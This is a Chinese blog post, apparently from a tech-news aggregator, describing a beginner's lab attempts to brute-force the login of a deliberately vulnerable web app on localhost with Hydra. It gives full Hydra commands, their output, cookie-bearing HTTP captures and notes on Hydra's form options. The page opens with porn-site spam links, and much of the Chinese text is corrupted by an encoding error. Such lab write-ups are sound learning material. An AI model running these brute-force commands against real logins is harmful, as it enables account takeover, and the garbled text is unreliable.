www.久久久久|狼友网站av天堂|精品国产无码a片|一级av色欲av|91在线播放视频|亚洲无码主播在线|国产精品草久在线|明星AV网站在线|污污内射久久一区|婷婷综合视频网站

當(dāng)前位置:首頁(yè) > 芯聞號(hào) > 充電吧
[導(dǎo)讀]剛剛開始學(xué)習(xí)web安全, 在本地機(jī)器上搭建了dvwa測(cè)試環(huán)境, 開始brute force的測(cè)試。 下面是通過瀏覽器顯示出來(lái)的html代碼 Username: Password:

剛剛開始學(xué)習(xí)web安全, 在本地機(jī)器上搭建了dvwa測(cè)試環(huán)境, 開始brute force的測(cè)試。

下面是通過瀏覽器顯示出來(lái)的html代碼

Username:

Password:


Username and/or password incorrect.


通過下方的鏈接http://hiderefer.com/?http://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29提供了兩個(gè)暴力美學(xué)破解的工具, 由于本機(jī)環(huán)境是linux, 很自然的選擇hydra(hydra是九頭蛇的意思, 一般看到英文的軟件名字, 如果不知道他的中文翻譯或者是哪幾個(gè)單詞的縮寫, 那么每次使用心里都會(huì)怪怪的)。

一開始認(rèn)為暴力破解很簡(jiǎn)單, 就是提供一個(gè)用戶名和密碼(或者字典)給自動(dòng)化工具, 然后就開始漫長(zhǎng)的等待就行了, 所以也沒多想, 直接運(yùn)行命令:

hydra -l admin -P password.txt ?127.0.0.1 http-get "/dvwa/vulnerabilities/brute/"

輸出的結(jié)果如下:

Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-08-13 23:23:55
[DATA] 2 tasks, 1 server, 2 login tries (l:1/p:2), ~1 try per task
[DATA] attacking service http-get on port 80
[80][www] host: 127.0.0.1   login: admin   password: aaaaa
[80][www] host: 127.0.0.1   login: admin   password: password
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-08-13 23:23:56


發(fā)現(xiàn)密碼文件中的兩個(gè)提供的密碼都通過驗(yàn)證了, 明顯不對(duì)。

第二次運(yùn)行命令:

?hydra -l admin -P password.txt ?127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/"

運(yùn)行結(jié)果:

Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-08-13 23:26:32
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: (null)

這次直接報(bào)錯(cuò), 原諒我這是第一次使用Hydra這個(gè)工具, 第一次接觸暴力破解。

上google搜索了一下hydra的用法, 以及相關(guān)的資料, 第三次運(yùn)行命令:

hydra -l admin -P password.txt -vV 127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect."

輸出結(jié)果如下:

Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-08-13 23:30:07
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 2 tasks, 1 server, 2 login tries (l:1/p:2), ~1 try per task
[DATA] attacking service http-get-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "aaaaa" - 1 of 2 [child 0]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - 2 of 2 [child 1]
[VERBOSE] Page redirected to http://127.0.0.1/dvwa/vulnerabilities/brute/../../login.php
[VERBOSE] Page redirected to http://127.0.0.1/dvwa/vulnerabilities/brute/../../login.php
[80][www-form] host: 127.0.0.1   login: admin   password: password
[STATUS] attack finished for 127.0.0.1 (waiting for children to complete tests)
[80][www-form] host: 127.0.0.1   login: admin   password: aaaaa
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-08-13 23:30:17

oh, my god, 這個(gè)和第一次是一樣的。

然后開始對(duì)照是不是字母拼寫錯(cuò)誤或者最后的失敗語(yǔ)句錯(cuò)了, 在確定一切都沒錯(cuò)之后開始邊懷疑這個(gè)工具的正確性邊開始google類似的問題, 期間還使用了fireforce這個(gè)工具試了一把, 結(jié)果也不太對(duì)。 這個(gè)時(shí)候已經(jīng)非常沮喪了, 處于崩潰的邊緣了......終于在backtrack論壇上發(fā)現(xiàn)了有人也是類似的問題, 后面有人回復(fù)說(shuō)這個(gè)不是BasicAuthentication, 而是Form-based Authentication, 還有人說(shuō)得用burp suite或者wireshark抓包看看真相是什么。 好吧, 由于沒有聽說(shuō)過HTTP Authentication這個(gè)名詞, 趕緊去google一下, 還是OWASP的這篇文章https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29解答了我這方面的全部疑惑, 期間順便補(bǔ)充了一下Base64編碼的知識(shí), 這些之前僅僅處于聽說(shuō)過狀態(tài)。

由于沒有用過Burp Suite, 所以直接選擇了wireshark, 抓包分析。

在頁(yè)面上隨便輸入用戶名和密碼提交后, wireshark發(fā)現(xiàn)每次瀏覽器都會(huì)自動(dòng)提交cookie:

GET /dvwa/vulnerabilities/brute/?username=admin&password=asdff&Login=Login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/dvwa/vulnerabilities/brute/
Cookie: security=low; PHPSESSID=o7qiqd9fc1d003u9d38k64t0f4
Connection: keep-alive

之后通過wireshark抓包發(fā)現(xiàn)這個(gè)cookie是在使用瀏覽器登錄的時(shí)候就設(shè)置好的, 不同的瀏覽器cookie是不同的, 開始默認(rèn)的security= high, 當(dāng)修改安全級(jí)別后服務(wù)器會(huì)重新發(fā)送set-cookie 為low, 以后每次提交表單或者get 操作都要提交這個(gè)cookie, 負(fù)責(zé)服務(wù)器驗(yàn)證是通不過的。

下面是重新使用google瀏覽器登錄dvwa, 服務(wù)器的response信息:

HTTP/1.1 302 Found
Date: Tue, 13 Aug 2013 15:55:30 GMT
Server: Apache/2.4.3 (Unix) OpenSSL/1.0.1c PHP/5.4.7
X-Powered-By: PHP/5.4.7
Set-Cookie: PHPSESSID=uku6iitcv0hhhd9mvna69sl9v7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: security=high
Location: ../../login.php
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

當(dāng)我們登錄成功后將安全等級(jí)提交為low后, 可以看到cookie的變化如下:

POST /dvwa/security.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/dvwa/security.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: security=high; PHPSESSID=uku6iitcv0hhhd9mvna69sl9v7

security=low&seclev_submit=SubmitHTTP/1.1 302 Found
Date: Tue, 13 Aug 2013 15:57:03 GMT
Server: Apache/2.4.3 (Unix) OpenSSL/1.0.1c PHP/5.4.7
X-Powered-By: PHP/5.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: security=low
Location: /dvwa/security.php
Content-Length: 0
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html

GET /dvwa/security.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36
Referer: http://127.0.0.1/dvwa/security.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: security=low; PHPSESSID=uku6iitcv0hhhd9mvna69sl9v7


可以看到之后的cookie已經(jīng)變過來(lái)了。


OK, 下面繼續(xù)進(jìn)行Hydra的命令操作, 第n次運(yùn)行命令, 這個(gè)是使用的firefox瀏覽器:

?hydra -l admin -P password.txt ?127.0.0.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=o7qiqd9fc1d003u9d38k64t0f4"


輸出如下:

Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-08-14 00:13:37
[DATA] 2 tasks, 1 server, 2 login tries (l:1/p:2), ~1 try per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-08-14 00:13:37


可以看到這次的運(yùn)行結(jié)果是正確的。 長(zhǎng)舒一口氣之后陷入了迷惑中, 通過運(yùn)行hydra -h或者是man hydra并沒有說(shuō)有 :H這個(gè)說(shuō)法, 上網(wǎng)google看到很多使用:C選項(xiàng)的, 這個(gè)工具到底怎么用, 什么時(shí)候使用:C 什么時(shí)候使用:H, google之后并沒有發(fā)現(xiàn)有人說(shuō)怎么用, 沒辦法, 只能去看源代碼。 幸好是c語(yǔ)言的, 我的偏愛。

后來(lái)又經(jīng)過wireshark抓包分析,以及對(duì)比源代碼分析, 發(fā)現(xiàn):C指定的是cookie文件的路徑, 這個(gè)路徑是服務(wù)器上的路徑, 也就是說(shuō)如果服務(wù)器上存放cookie的文件是/path/cookie, 那么就可以用:C=/path/cookie來(lái)指定hydra從服務(wù)器上獲取cookie, 然后自動(dòng)添加到每次的get或者post的http header中, 如果像dvwa這樣沒有cookie的專門文件或者我們不知道cookie的存放文件, 那么就用:H來(lái)每次手動(dòng)指定。

如果指定了:C=/path/cookie 那么每次hydra提交之前首先會(huì)去get /path/cookie 來(lái)得到cookie, 然后每次分析response返回的信息,自動(dòng)將cookie添加到http 的header中。

:H其實(shí)是用來(lái)手動(dòng)添加Header 域的, 比如上面的我們手動(dòng)添加了 :H=Cookie: security=low; PHPSESSID=o7qiqd9fc1d003u9d38k64t0f4, 這其實(shí)是告訴hydra每次get或者post的時(shí)候要添加上這個(gè):H后面的頭部的域。

通過大概的閱讀源代碼可以得知如果hydra捕獲了response中的set-cookie, 那么我們也不用每次手動(dòng)添加cookie。


目前為止已經(jīng)基本弄明白了如何使用hydra來(lái)進(jìn)行http的brute force測(cè)試, 后面還會(huì)繼續(xù)嘗試hydra應(yīng)用于別的協(xié)議的暴力美學(xué)破解。

每天都有進(jìn)步的生活是值得期待的!














本站聲明: 本文章由作者或相關(guān)機(jī)構(gòu)授權(quán)發(fā)布,目的在于傳遞更多信息,并不代表本站贊同其觀點(diǎn),本站亦不保證或承諾內(nèi)容真實(shí)性等。需要轉(zhuǎn)載請(qǐng)聯(lián)系該專欄作者,如若文章內(nèi)容侵犯您的權(quán)益,請(qǐng)及時(shí)聯(lián)系本站刪除。
換一批
延伸閱讀

9月2日消息,不造車的華為或?qū)⒋呱龈蟮莫?dú)角獸公司,隨著阿維塔和賽力斯的入局,華為引望愈發(fā)顯得引人矚目。

關(guān)鍵字: 阿維塔 塞力斯 華為

倫敦2024年8月29日 /美通社/ -- 英國(guó)汽車技術(shù)公司SODA.Auto推出其旗艦產(chǎn)品SODA V,這是全球首款涵蓋汽車工程師從創(chuàng)意到認(rèn)證的所有需求的工具,可用于創(chuàng)建軟件定義汽車。 SODA V工具的開發(fā)耗時(shí)1.5...

關(guān)鍵字: 汽車 人工智能 智能驅(qū)動(dòng) BSP

北京2024年8月28日 /美通社/ -- 越來(lái)越多用戶希望企業(yè)業(yè)務(wù)能7×24不間斷運(yùn)行,同時(shí)企業(yè)卻面臨越來(lái)越多業(yè)務(wù)中斷的風(fēng)險(xiǎn),如企業(yè)系統(tǒng)復(fù)雜性的增加,頻繁的功能更新和發(fā)布等。如何確保業(yè)務(wù)連續(xù)性,提升韌性,成...

關(guān)鍵字: 亞馬遜 解密 控制平面 BSP

8月30日消息,據(jù)媒體報(bào)道,騰訊和網(wǎng)易近期正在縮減他們對(duì)日本游戲市場(chǎng)的投資。

關(guān)鍵字: 騰訊 編碼器 CPU

8月28日消息,今天上午,2024中國(guó)國(guó)際大數(shù)據(jù)產(chǎn)業(yè)博覽會(huì)開幕式在貴陽(yáng)舉行,華為董事、質(zhì)量流程IT總裁陶景文發(fā)表了演講。

關(guān)鍵字: 華為 12nm EDA 半導(dǎo)體

8月28日消息,在2024中國(guó)國(guó)際大數(shù)據(jù)產(chǎn)業(yè)博覽會(huì)上,華為常務(wù)董事、華為云CEO張平安發(fā)表演講稱,數(shù)字世界的話語(yǔ)權(quán)最終是由生態(tài)的繁榮決定的。

關(guān)鍵字: 華為 12nm 手機(jī) 衛(wèi)星通信

要點(diǎn): 有效應(yīng)對(duì)環(huán)境變化,經(jīng)營(yíng)業(yè)績(jī)穩(wěn)中有升 落實(shí)提質(zhì)增效舉措,毛利潤(rùn)率延續(xù)升勢(shì) 戰(zhàn)略布局成效顯著,戰(zhàn)新業(yè)務(wù)引領(lǐng)增長(zhǎng) 以科技創(chuàng)新為引領(lǐng),提升企業(yè)核心競(jìng)爭(zhēng)力 堅(jiān)持高質(zhì)量發(fā)展策略,塑強(qiáng)核心競(jìng)爭(zhēng)優(yōu)勢(shì)...

關(guān)鍵字: 通信 BSP 電信運(yùn)營(yíng)商 數(shù)字經(jīng)濟(jì)

北京2024年8月27日 /美通社/ -- 8月21日,由中央廣播電視總臺(tái)與中國(guó)電影電視技術(shù)學(xué)會(huì)聯(lián)合牽頭組建的NVI技術(shù)創(chuàng)新聯(lián)盟在BIRTV2024超高清全產(chǎn)業(yè)鏈發(fā)展研討會(huì)上宣布正式成立。 活動(dòng)現(xiàn)場(chǎng) NVI技術(shù)創(chuàng)新聯(lián)...

關(guān)鍵字: VI 傳輸協(xié)議 音頻 BSP

北京2024年8月27日 /美通社/ -- 在8月23日舉辦的2024年長(zhǎng)三角生態(tài)綠色一體化發(fā)展示范區(qū)聯(lián)合招商會(huì)上,軟通動(dòng)力信息技術(shù)(集團(tuán))股份有限公司(以下簡(jiǎn)稱"軟通動(dòng)力")與長(zhǎng)三角投資(上海)有限...

關(guān)鍵字: BSP 信息技術(shù)
關(guān)閉
關(guān)閉